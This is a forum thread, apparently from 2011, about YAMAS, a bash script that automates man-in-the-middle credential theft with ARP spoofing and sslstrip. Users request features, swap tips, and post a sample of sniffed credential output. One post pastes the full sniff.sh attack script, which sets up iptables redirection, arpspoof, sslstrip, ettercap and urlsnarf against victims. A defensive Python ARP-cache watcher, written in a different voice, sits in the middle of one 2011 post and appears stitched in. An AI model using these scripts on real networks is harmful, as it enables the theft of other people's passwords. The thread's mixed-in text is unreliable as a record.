Script for sniffing traffic.



comaX
05-14-2011, 06:27 PM
There are a lot of those scripts, hence the name : Yet Another Mitm Automation Script.
It was originally made for BT4r2 but I "ported" it to BT5, corrected a few bugs and added a few features.

I can't post the script here without raising some kind of warning due to massive use of certain words for parsing, but please review the source at http://yamas.comax.fr
You will be able to view the source, download the script and view a demo video.

It works just great for me, so I hope it will for you too.

Current main features are :
- Real-time output of creds without definition files : any credential, from any website should show up, as well as the site it was used on !
- Log parsing for user-friendly output.
- DNS spoofing once attack is launched
- Network mapping for host discovery.
- Can save dumped passwords to file as well as the whole log file.
- Support for multiple targets on the network, as well as adding targets after attack is launched.
- Sslstrip checking (existence, executable, directory, check version, update...)
- Standalone script, updatable, interactive (new !).

Please don't hesitate to give me your feedback, I'm always looking for new ideas, and ways to improve it !

Check http://comax.fr/yamas.php for more infos, video, other platform versions and an article about how to protect you from it !

[Current version as of 02/02/2012 : 20120202 ]

Ubuntu4life
05-14-2011, 07:33 PM
Thanks.
Have used this before, thanks for porting/updating.

Is it possible that a modem is immune to ARP poisoning? Since I have this new modem I keep failing at doing a successful attack.
Do you want to contact me?
Thanks.

sickness
05-15-2011, 07:13 AM
Try arp poisoning only one way

sostentado
05-15-2011, 08:07 AM
oops..... link error.... please review your link.. thank you.

comaX
05-15-2011, 08:38 AM
oops..... link error.... please review your link.. thank you.
Oops, corrected now, thank you !

EDIT : disregard text in brackets ; I found a way to do that. It's home-made workaround, but it works !
[Script-wise, I found a way to loop the parsing process every x seconds (wasn't that hard after all...) and it works just the way I wanted it to, but when I try to pass the function to xterm, it closes immediately. Maybe functions can't be executed in xterm ? That would be logical if xterm doesn't have access to the script*, hence it would not know the function. Any idea ?

*I mean that xterm is like launching a new console, so the function is not defined for the xterm window. ]

Bottom line : as attack is running, credentials are displayed as they are sniffed !

Again, please give your feedback so I can improve it ! Anything really, even grammar.

Ubuntu4life
05-15-2011, 04:44 PM
Try arp poisoning only one way
Alright thanks, worked.

michelinok
05-16-2011, 06:37 PM
hey man...why should we "arp poison" ? doesn't the script do this job already? (please,explain...) many thanks!

comaX
05-16-2011, 07:08 PM
Yes, it does the arp poisoning, with arpspoof. I'll let someone else explain since I don't have much time, or I'll come back to edit ;)

Editing time it is ! So, I believe that when sickness speaks about one-way poisoning, he tells you to poison only the victims, and not the whole network, in which case you can also poison the router, and the router might detect the poisoning (please, anyone, correct me if I'm wrong !).

Script-wise, this means you'd better use the feature to target only a few hosts rather than the whole network.

Anyway, yes, the script "does" the arp poisoning !

oxycodine
05-16-2011, 11:37 PM
great little script

I don't really know how you could make it better, maybe os detection?

comaX
05-17-2011, 01:40 PM
great little script

I don't really know how you could make it better, maybe os detection?
Thanks :)
Since I made it for BT4, and ported it to BT5, and both are still accessible, I don't feel it's very necessary... Maybe you are talking about different linux distros ?
Could be something, provided I also include ways to download the needed applications. But that would be a little bit out of the "script thing".

Maybe some bugs found ? More comments should be added ?
Since I updated it a little bit, I didn't really pay attention to "UI"... Something to change on that ?

Thanks again for your message, I'll keep the OS detection somewhere in my head, probably for when I will have succeeded porting it to python !

ShortBuss
05-17-2011, 04:23 PM
The link on http://comax.pagesperso-orange.fr/info/#yamas and the link http://comax.pagesperso-orange.fr/info/mitm/ both point to an old version of the script: VERSION="0.6.9\033[31m-BT5\033[m"

If you download from the update link in the script, http://comax.pagesperso-orange.fr/mitm.sh, then you get the latest version: VERSION="0.7.2\033[31m-BT5\033[m"

It's likely user error due to my lack of knowledge, but I couldn't get the 0.6.9 version to run while the 0.7.2 version ran without issue. With version 0.6.9 it was complaining about an error on line #10 that I couldn't find any problems with.

comaX
05-18-2011, 03:35 PM
Yeahp, use updated 0.7.2-BT5 version, it's the last one to date ! I update the website only from time to time. But since it seems to be confusing, I'll do it as soon as I can ! I'll edit this post once everything is clarified, thanks for the report ;)
Checked just after posting, the "download script" button links to the good version. The pastebin is "old" though. I'll update it as well !
(Were you copying pastebin rather than downloading ?)

EDIT : all right ! Everything should now point to the latest version. Also, please note that as soon as I have finished testing a "version", i upload it to the server. So even if the website doesn't say anything about it, you can try updating through the script or the website. Of course, don't hesitate to post here, PM me, or mail me for anything !

ShortBuss
05-18-2011, 07:26 PM
I think I did a save-as on the Download Raw link from the pastebin version. I thought this was the primary source location until I started digging through the script and noticed where it got the file from. Once I figured that out I just ran the wget line at a prompt to get the file.

ckcrown
05-19-2011, 04:05 AM
ComaX.
This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
Any help would be appreciated.

comaX
05-19-2011, 11:55 AM
ComaX.
This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
Any help would be appreciated.

Yeah, I thought about that, but the parsing is already pretty intense, so I didn't want to make it heavier... And I don't want to use definitions ! This is and will always be a standalone script :) [*except for that little work-around mentioned earlier :p ]
So about those sites, two things :
1) People generally use the same login/pass pretty much everywhere, so the site it was sniffed from shouldn't be much of a problem.
2) If you really want the site it was sniffed from, you can save the log at the end and search through it, it should be pretty fast since you know both login and pass.

If you have an idea for parsing sites at the same time as the rest, without being too much of a job, I'm all ears !

On another note : Sslstrip 0.9 is out and seems less buggy than 0.8. There is now an option to update sslstrip, if it is installed only. There will shortly be an option to install it, and/or update it.

ckcrown
05-19-2011, 03:39 PM
ComaX,
I ran across a script a while back called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass. I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?



#!/bin/bash

# Script for sniffing https connections.
# Script uses Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET

ShortBuss
05-19-2011, 04:51 PM
My vote is for option to install the updated sslstrip. One of the reasons I like the idea of this script is that it's very helpful for beginners, like me, who aren't very familiar with the console commands needed to do something like this. I could, and will figure it out by searching these forums, of course.

Edit:

Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system is taken out of the middle.
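The two symptoms ShortBuss describes here are what a victim host can actually observe: its ARP entry for the gateway changes to another machine's MAC while the attack runs, and flips back when arpspoof exits cleanly and sends its correcting replies. The following script is an added example written for this thread, not YAMAS or sniff.sh code: it parses /proc/net/arp-style text and alerts on a gateway MAC change or on one MAC answering for several IPs. Every address and snapshot below is constructed for the demo, and the gateway address 192.168.1.1 is an assumption.

```python
# Added example: a host-side ARP cache watcher (not YAMAS or sniff.sh code).
# It parses /proc/net/arp-style text and raises alerts when the gateway's
# MAC changes or when one MAC answers for several IPs, the two symptoms a
# poisoned victim shows. All addresses and snapshots below are constructed.
import re
from collections import defaultdict

# /proc/net/arp columns: IP address, HW type, Flags, HW address, Mask, Device
ARP_LINE = re.compile(
    r"^(\S+)\s+\S+\s+\S+\s+([0-9a-fA-F:]{17})\s+\S+\s+(\S+)\s*$"
)
INCOMPLETE = "00:00:00:00:00:00"


def parse_proc_arp(text):
    """Return {ip: mac} from /proc/net/arp text, skipping the header line
    and incomplete (all-zero) entries."""
    table = {}
    for line in text.splitlines()[1:]:
        m = ARP_LINE.match(line)
        if not m:
            continue
        ip, mac, _dev = m.groups()
        mac = mac.lower()
        if mac != INCOMPLETE:
            table[ip] = mac
    return table


def check_snapshot(table, gateway_ip, state):
    """Compare one ARP snapshot against learned state and return alerts.
    state['gateway'] holds the first MAC seen for the gateway (the baseline)."""
    alerts = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is not None:
        known = state.get("gateway")
        if known is None:
            state["gateway"] = gw_mac  # learn the baseline on first sight
        elif gw_mac != known:
            alerts.append(f"gateway {gateway_ip} MAC changed {known} -> {gw_mac}")
    # One MAC claiming several IPs is the other classic poisoning sign.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"MAC {mac} answers for {', '.join(sorted(ips))}")
    return alerts


# Constructed snapshots: before the attack, during it (the host at .50 now
# answers for the gateway), and after a clean arpspoof exit restored the entry.
SNAP_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:01     *        eth0
192.168.1.50     0x1         0x2         de:ad:be:ef:00:50     *        eth0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
"""
SNAP_DURING = SNAP_BEFORE.replace("aa:bb:cc:00:00:01", "de:ad:be:ef:00:50")
SNAP_AFTER = SNAP_BEFORE


def run_demo(gateway_ip="192.168.1.1"):
    """Feed the three snapshots through the checker; returns alerts per snapshot."""
    state = {}
    return [check_snapshot(parse_proc_arp(s), gateway_ip, state)
            for s in (SNAP_BEFORE, SNAP_DURING, SNAP_AFTER)]


if __name__ == "__main__":
    for i, alerts in enumerate(run_demo()):
        print(f"snapshot {i}: {alerts or 'clean'}")
```

On a real Linux host you would call parse_proc_arp(open("/proc/net/arp").read()) on a timer instead of the constructed snapshots. Note that a legitimate gateway hardware replacement trips the first check too, so the learned baseline has to be refreshed deliberately rather than silently accepting the new MAC.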

kafteras
05-21-2011, 03:25 AM
Hey comaX. I have played around with your script and it's very nice and clean but sometimes a lot of python errors appear. Do you know the reason?
Here are some of them..

Traceback (most recent call last):
File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 146, in _doReadOrWrite
why = getattr(selectable, method)()
File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 460, in doRead
return self.protocol.dataReceived(data)
File "/usr/lib/python2.6/dist-packages/twisted/protocols/basic.py", line 259, in dataReceived
return self.rawDataReceived(data)
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 537, in rawDataReceived
self.handleResponseEnd()
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
self.handleResponse(b)
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 134, in handleResponse
self.shutdown()
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 154, in shutdown
self.client.finish()
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
"Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

comaX
05-21-2011, 03:14 PM
Thanks for the feedback !


ComaX,
I ran across a script a while back called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass. I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?

Hmm, I'll look into that but I won't spend too much time either, for the reasons I evoked earlier.


Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system is taken out of the middle.

Very good point ! I'll try and do that, it shouldn't be much of a problem. For arpspoof, I believe it is a clean shutdown, since in every test I did, I could get back on the internet immediately.

[Edit] Status : DONE


That's just great ! You don't have to click back into the main window for the name, so it's smoother, and that way we're sure we don't send non-stripped ssl. You just earned a place in the credits :P (If you don't want your nick in it, just tell me ;) )
I don't know why I didn't think of that before !
And yes, arpspoof is cleanly shut.


Hey comaX. I have played around with your script and it's very nice and clean but sometimes a lot of python errors appear. Do you know the reason?
Here are some of them..
Yup, those are sslstrip/python errors, they're not from my script, and I can't do anything about that. Did you update to sslstrip 0.9 ? It's less buggy.
All I can try to do is to shut verbosity of error output... I didn't think about that, I'll do that too !

[Edit] Status : DONE


Yup, now it's all quiet ! I just had to add "2> /dev/null". But errors still happen. Anyway, since they are not fatal, nor disrupt anything... It's all good !

Thanks for the feedback again, I'll try to work on that tonight or tomorrow.

Edit : with all that and some stuff here and there, 0.7.4 is ready ! It will be online tomorrow (22/05/11) !

heysuess
05-21-2011, 05:52 PM
Awesome script, thanks for putting the time into it.

SRThomson
05-22-2011, 10:15 AM
Thank you for the script.


SRT.

kafteras
05-22-2011, 07:31 PM
Yup, those are sslstrip/python errors, they're not from my script, and I can't do anything about that. Did you update to sslstrip 0.9 ? It's less buggy.
All I can try to do is to shut verbosity of error output... I didn't think about that, I'll do that too !

[Edit] Status : DONE
Yup, now it's all quiet ! I just had to add "2> /dev/null". But errors still happen. Anyway, since they are not fatal, nor disrupt anything... It's all good !


Ok thx comaX. I have the 0.9 version but the errors still exist. I don't currently have any BT4 install to check if they exist there also, so we can see if it's the sslstrip problem or something else.

comaX
05-23-2011, 04:30 PM
A day later than expected, v0.7.4 is out ! I will also probably do a demo video in the next few days. Stay tuned, and as always, please give feedback !

(About urlsnarff, and url parsing, I didn't have much time to look into it... Maybe later !)

ShortBuss
05-23-2011, 05:55 PM
I don't think I mentioned it yet, but great script and I appreciate the work you are putting into it.

Problem with Line 88: "chmod +x /usr/bin/mitm #make newly installed script executable" mitm is missing the ".sh" and is throwing an error when running the update option.

Also, at the end of the script, after the parser is launched, the script is just waiting to be killed. Could you make a loop at the end to accept several options instead?
1. Re-scan network. This would be to find new targets that may have joined.
2. Add a new target for arpspoof (e.g. "a 192.168.1.106")
3. Quit

A new single target doesn't make much sense if you are already spoofing the whole subnet. I don't know that it's possible to have an option to kill an existing single arpspoof instance, but as long as you can get to the window you can ctrl+c any existing instance to shut it down without the script's help. Can the title of the arpspoof windows include the IP address?

With a choice list like this it may make more sense to start sslstrip and parsing first and then just drop the user into the choice list.

Sorry if I'm suggesting something too complex. I'm not familiar at all with the scripting.

comaX
05-24-2011, 06:19 PM
Those are pretty good ideas !
The problem at line 88 might already have been corrected, but I'll check, thanks for reporting ;)
EDIT : I tried updating, and I had no problem... But I changed it to $0 anyway, just to make sure !

At the end, no need for a "loop". I think, waiting for something to do is fine ! And instead of waiting for "quit" it could wait for different things ;)
Scanning the network could become a function like scan() [by the way, I should really get a better way of scanning... That was early quick-fix, but I find it a little bit barbarian !].
Adding a target to arpspoof shouldn't be a problem either, another function to be called, that would launch another xterm arpspoof window. Killing them from the script (apart from final cleanup) would be too complex I think, and since there is no automation to be done here (I won't read arpspoof's output to know if target is still reachable... You still have to do two-three things, on purpose !), I don't see any purpose in doing that :P

With that said, if you are already targeting the whole network, the latter option would be useless... But, that's doable !

And then, quitting, of course !

Yeah, I like it ! I'll work on that when I have time (this is much bigger than anything else I was suggested !).

I also have been suggested to make default option for the ports for instance. What do you think I should do about that ? It makes sense since it's an automation tool, but it's also a learning tool, so typing in a few ports, knowing why you choose them is to me a good thing. I'm really hesitating here, so just tell me what you people would rather like !

Thanks again for the feedback !

ShortBuss
05-24-2011, 08:27 PM
The script is already hiding a lot of the complexity of the process. I don't think that people will be missing out on much more knowledge by defaulting ports. Also you can implement it in a way where the user will at least see what the default port is. For example "Choose a port for sslstrip (Enter = 10000)".

The suggestion of the loop was so that you wouldn't have to write a limited number of prompts for the user to respond to. In the existing script it's 4 occurrences of mostly the same prompt at the end. If you put a big decision prompt with all options in a loop you could write it once and the user wouldn't be limited to the number of times they could choose one of the options. Again if you are coming from the stance of spoofing the entire network, there's not much use. If you are instead isolating to just a few targets and looking for others to add then it makes more sense.

Of course the user can have the exact same functionality by just opening another terminal and running the additional arpspoof commands there. All logs still go to the same sslstrip log and still get parsed by the same process.

Also for target discovery I see a lot of suggestions for nmap. I usually use "nmap -sn 192.168.1.*" for a very quick discovery of hosts in the subnet. I'm sure there are much better methods.

zimmaro
05-24-2011, 09:13 PM
OPTIMUS! script !thanks a lot! work perfect in bt5!!!:rolleyes:

comaX
05-25-2011, 08:02 PM
The script is already hiding a lot of the complexity of the process. I don't think that people will be missing out on much more knowledge by defaulting ports. Also you can implement it in a way where the user will at least see what the default port is. For example "Choose a port for sslstrip (Enter = 10000)".

The suggestion of the loop was so that you wouldn't have to write a limited number of prompts for the user to respond to. In the existing script it's 4 occurrences of mostly the same prompt at the end. If you put a big decision prompt with all options in a loop you could write it once and the user wouldn't be limited to the number of times they could choose one of the options. Again if you are coming from the stance of spoofing the entire network, there's not much use. If you are instead isolating to just a few targets and looking for others to add then it makes more sense.

Of course the user can have the exact same functionality by just opening another terminal and running the additional arpspoof commands there. All logs still go to the same sslstrip log and still get parsed by the same process.

Also for target discovery I see a lot of suggestions for nmap. I usually use "nmap -sn 192.168.1.*" for a very quick discovery of hosts in the subnet. I'm sure there are much better methods.

The default thing was suggested by "Binx", and is already ready to use, thanks to him. And it's just as you said. [edited]

Edit : finally it was pretty simple, and I like the result ! There are the 3 choices you proposed, which seem enough, but if anyone has more suggestions, let them come ! I also changed the host discovery feature to something way better. It should have been done a long time ago too, I guess more people using it and giving feedback helps rethinking things :)

Thanks again ;)

Ps : current version is v0.7.5 !

ShortBuss
05-25-2011, 08:39 PM
I've never tried to write bash, so please forgive any formatting errors or any misunderstandings of what limitations you are working under. Here is a rough flow I was thinking of:

1. IP Tables Cleanup
2. Start sslstrip
3. Start loop parse
4. Decision loop:


while :
do
    echo "What now? (q = quit, s = scan for hosts, a = arpspoof full network, t <ip> = arpspoof single ip)"
    # read the command and, for "t <ip>", the ip that follows it
    read -e decision target
    if [[ "$decision" = "q" ]] ; then
        cleanup
        break
    elif [[ "$decision" = "s" ]] ; then
        : # call to scan method here
    elif [[ "$decision" = "a" ]] ; then
        : # call to arpspoof full network here
    elif [[ "$decision" = "t" ]] ; then
        : # call to arpspoof single ip here, using "$target"
    else
        echo "Unknown command: $decision" # statement about bad command entry here
    fi
done


The idea is to setup and kick off all the necessary stuff first. Then execute the more detailed work based on user input. I do understand this may be going beyond your intentions for the script.

comaX
05-29-2011, 11:48 AM
I've never tried to write bash, so please forgive any formatting errors or any misunderstandings of what limitations you are working under. Here is a rough flow I was thinking of:[edited].
Seems like your post appeared after mine in the end...

I did a pretty major update this morning, so if you are using the script on a regular basis, I suggest you check it !
I also did a demonstration video, but it's fast and short. I will maybe try to make a better one when I have more time, with music and all.
(How about some portal 2 song ? Or maybe I'll stick to death metal. Tell me what you'd rather like !)


Keep the feedback coming !

[version on 29/05/11 : 0.7.7]

ShortBuss
05-30-2011, 12:14 AM
Thanks for the continued updates. I haven't had a chance to run it again yet, but am poking through the code. Couple of things:

1. The add_target function doesn't seem to use the target IP in the title. This is done now in the initially created arpspoof commands, just not the ones from the add_target call.

2. I couldn't get the demo video to play. May have just been me. I'll try it again later. I hit the "Demo Video" button and it popped up the viewer, but it just never started. The progress bar kept spinning.

3. In the loop parse, I still don't have any great ideas. It may be better to have a button to request refresh rather than auto refreshing every 5 seconds. At least this way you'd have the chance to scroll through or copy paste if needed. Of course if you can figure out a way to request a pause while it auto refreshes that would be even better. What about if you wrote to a file and then ran the tail command to continually monitor that file for new data and display the tail output in the window: "tail -f filename"

portos
06-02-2011, 05:37 AM
Hi all!
That's what I see in the file yamas.pass.txt - but... And where are the passwords!? Thanks!

Login = 3Y%2DQD8M5NERYLLMCCL4EIFRYFVVB4BT9
Login = '+encodeURIComponent(document.getElementById('emai l_toemail').value)+'
Password = ' + document.getElementById('edit_password').value;

Login = kimble
Login = "http://nht-2.extreme-dm.com/n2.g?login
Login = kimble
Login = "http://nht-2.extreme-dm.com/n2.g?login
Login = '+encodeURIComponent(document.getElementById('emai l_toemail').value)+'
Password = ' + document.getElementById('edit_password').value;

Login = kimble
Login = "http://nht-2.extreme-dm.com/n2.g?login
Login = '+encodeURIComponent(document.getElementById('emai l_toemail').value)+'
Password = ' + document.getElementById('edit_password').value;

Login = kimble
Login = "http://nht-2.extreme-dm.com/n2.g?login
Login = 3Y-QD8M5NERYLLMCCL4EIFRYFVVB4BT9
Login = "+a(h):"",google.j

DrEmmettBrown
06-04-2011, 03:35 AM
I'm testing the latest version v0.8 and it doesn't seem to show the logins and passwords

comaX
06-04-2011, 10:12 AM
Thanks for the continued updates. I haven't had a chance to run it again yet, but am poking through the code. Couple of things:

1. The add_target function doesn't seem to use the target IP in the title. This is done now in the initially created arpspoof commands, just not the ones from the add_target call.

2. I couldn't get the demo video to play. May have just been me. I'll try it again later. I hit the "Demo Video" button and it popped up the viewer, but it just never started. The progress bar kept spinning.

3. [looping, parsing, tailing stuff]

1. DONE
2. Works for me ! Maybe a codec problem ? Try again ;) (also might take some time to load, even if the vid is only 2Mo...)
3. cf end of post.


Hi all!
That's what I see in the file yamas.pass.txt - but... And where are the passwords!? Thanks!

Login = 3Y%2DQD8M5NERYLLMCCL4EIFRYFVVB4BT9
Login = '+encodeURIComponent(document.getElementById('emai l_toemail').value)+'
Password = ' + document.getElementById('edit_password').value;

That's just junk, but you should know it since you were the one to type in the password, right ? You are using it on your own personal network, targeting your own machine right ?

Anyway, that's output from the old parsing method, so I suggest you update : there is now a lot less junk, and the website from which credentials were sniffed is displayed !

I also added an option to tail the log file, in order to make sure we are sniffing traffic.

Those last two features must be tested though, since I couldn't test much, lacking time, and having had a horrible connection when I tried.

So, update, report, enjoy !

[Current version as of 03/06/11 : v0.8.1]

ShortBuss
06-05-2011, 04:22 AM
The new install and update work perfectly for me now. I'll try out the new version soon.

ericmilam
06-05-2011, 08:09 AM
I like what you did with the realtime password detection. I have that as a todo in easy-creds. I am just wondering if things don't get missed with so many "custom" values for usernames & passwords. Seems like that egrep line of code would just continue to grow.

It might make sense to have a defs file and then let your script run against that. Just call a script to parse the sslstrip log against a def file every 10 secs or so.

I have noticed as I continue to use the script I find values that are not currently caught by the defs file in easy-creds and add them as I go.

Great script. With ettercap behaving badly in BT5 ARP spoof may have to be the way to go. Kind of hard though when you are trying to poison 100 systems or so.

Caught a cred with easy-creds that cain didn't pick up. (port 389 traffic) Was able to crack the corp with it. Always great to have another tool in the bag like this script, thanks for sharing.

Happy hunting!

P.s. I'm gonna "borrow" your real-time detection if that's ok with you.... :cool:

comaX
06-05-2011, 09:00 PM
I like what you did with the realtime password detection. I have that as a todo in easy-creds. I am just wondering if things don't get missed with so many "custom" values for usernames & passwords. Seems like that egrep line of code would just continue to grow.

It might make sense to have a defs file and then let your script run against that. Just call a script to parse the sslstrip log against a def file every 10 secs or so.

I don't think anything gets missed ; in all my tests, I never missed anything, and nobody ever reported about not finding anything, so I believe it's efficient ! The egrep line is not very pretty, for sure, but I can't seem to do that in awk... In which case I'd just do a parser.awk script...
Before doing this script, I found yours, and as I posted before (in BT4 forums) I didn't like the definition file thing, for the simple reason it's restrictive, and it requires a second file (btw, why not generating it instead of downloading it as a separate thing ?). I never got to add things to your defs file so I thought "fcuk it, I'll do my own", and that's how I started !


Great script. With ettercap behaving badly in BT5 ARP spoof may have to be the way to go. Kind of hard though when you are trying to poison 100 systems or so.
Thanks ! I'll trust you about attacking a 100 systems with arpspoof, since I never got to do more than about ten at a time !


Caught a cred with easy-creds that cain didn't pick up. (port 389 traffic) Was able to crack the corp with it. Always great to have another tool in the bag like this script, thanks for sharing.
Once again, thank you ! I hope this helps !

Happy hunting!


P.s. I'm gonna "borrow" your real-time detection if that's ok with you.... :cool:
That would be an honour, please do ! If you can add some credits, that would be perfect, if not, I won't sue you nor hold any grudge against you ;)

ericmilam
06-05-2011, 11:47 PM
I don't think anything gets missed ; in all my test, i never missed anything, and nobody ever reported about not finding anything, so I believe it's efficient !

Well, I would just say it hasn't been tested enough places yet ;) You'll find that different sites have diff values and though you've done a great job grabbing the most common, you'll find you'll need to continue to add to that egrep statement. How do you think Cain does it? It has a large set of values for username & password that it compares against.

You may not have the same defs file as easy-creds, but you are trying to do the same "magic" in your egrep/awk line of code. I know because I tried too and the best way, or what I found for me the most accurate way was to build a specific defs file. The defs file can and should be added to. I recently made a post on how to do it.

I've got a red team pt in a few weeks, I'll give your script a run and provide feedback. In the end though, I think you may end up succumbing to a defs file...perhaps one just more elegant than mine ;)

comaX
06-06-2011, 09:39 AM
Well, I would just say it hasn't been tested enough places yet ;) You'll find that different sites have diff values and though you've done a great job grabbing the most common, you'll find you'll need to continue to add to that egrep statement. How do you think Cain does it? It has a large set of values for username & password that it compares against.

You may not have the same defs file as easy-creds, but you are trying to do the same "magic" in your egrep/awk line of code. I know because I tried too and the best way, or what I found for me the most accurate way was to build a specific defs file. The defs file can and should be added to. I recently made a post on how to do it.

I've got a red team pt in a few weeks, I'll give your script a run and provide feedback. In the end though, I think you may end up succumbing to a defs file...perhaps one just more elegant than mine ;)

Yeah, I found your post about how adding them just yesterday, and it seemed pretty obvious... I don't know what I did wrong ! It's a great script you have there though, and my only problem with it really was that defs file ! But that's just a personal preference, I'm not saying it's bad ;)

Your feedback will be very welcome, I'm looking forward to reading it ;) I'll give yours another try too, since I tested it a while ago.

Thanks again, cheers !

Ubuntu4life
06-08-2011, 01:20 AM
Liking the work you do.

michelinok
06-09-2011, 09:59 AM
Hi ComaX,
good job.
One suggestion...why don't you include the option to start ettercap in text mode? It would be a great thing I think! (it's just a suggestion of course!!!).

comaX
06-13-2011, 10:05 AM
Liking the work you do.
Thanks !


Hi ComaX,
good job.
One suggestion...why don't you include the option to start ettercap in text mode? It would be a great thing I think! (it's just a suggestion of course!!!).
I don't know when you posted that, but I missed answers for a time... Anyway, that's done ! Launch the script with -e or --etter ;)

Also, I'm planning on adding DNS-spoofing feature in the next big update. That might take some time though, since I got back on Black Ops lately :p

What I would love to hear is your input on the latest features I added : stopping/resuming/etc. the realtime parsing and the ettercap option ;)

As always, don't hesitate to make any suggestion, even grammar-wise if ever I misspelled something.

My website is not up-to-date, but the script version as I write this is 0.9 and the download button will retrieve the last version ;)

M00kaw
06-13-2011, 12:55 PM
Hey there ComaX ..

I haven't used your script (yet), but I've been very inspired by the code you've written..

I'm currently working on a script that sets up a fake access point, runs ssl-strip and then greps the sslstrip.log..
I really had issues figuring out how to cat sslstrip.log | grep username/password, but after I read your code, I noticed how you did it. Really nice way of doing it..
I'm planning on using the code in my script, if you don't mind? (and of course the credit will go out to you;> )

//M00kaw

comaX
06-13-2011, 01:20 PM
Hey there ComaX ..

I haven't used your script (yet), but I've been very inspired by the code you've written..

I'm currently working on a script that sets up a fake access point, runs ssl-strip and then greps the sslstrip.log..
I really had issues figuring out how to cat sslstrip.log | grep username/password, but after I read your code, I noticed how you did it. Really nice way of doing it..
I'm planning on using the code in my script, if you don't mind? (and of course the credit will go out to you;> )

//M00kaw

No problem, please do ;) Good luck on your script !

michelinok
06-13-2011, 06:39 PM
Hi comaX,
for the ettercap question...maybe my English is not so good...but I meant using ettercap for sniffing passwords instead of using your parsing algorithm.
Any idea about using ettercap this way? (or am I missing something?)

comaX
06-13-2011, 10:09 PM
Hi comaX,
for the ettercap question...maybe my English is not so good...but I meant using ettercap for sniffing passwords instead of using your parsing algorithm.
Any idea about using ettercap this way? (or am I missing something?)

